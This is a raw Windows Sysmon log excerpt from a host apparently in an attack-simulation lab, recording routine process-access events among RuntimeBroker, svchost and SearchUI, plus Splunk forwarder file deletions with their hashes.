12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 23542300x80000000000000006796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.477{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E442FAACD2856549F247FC7B4A8BE785,SHA256=1EECEA8FE35467A27D68EC99B84BB147F12D5581AAF1F3FC198E579E97FDAF92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.461{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84896E480252AAD70F5DB90EA4DB6ADB,SHA256=8AD8CFF569AE2AB097D80A95104C98184A5080A781D0E90D151A8ADD67B10B20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.399{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 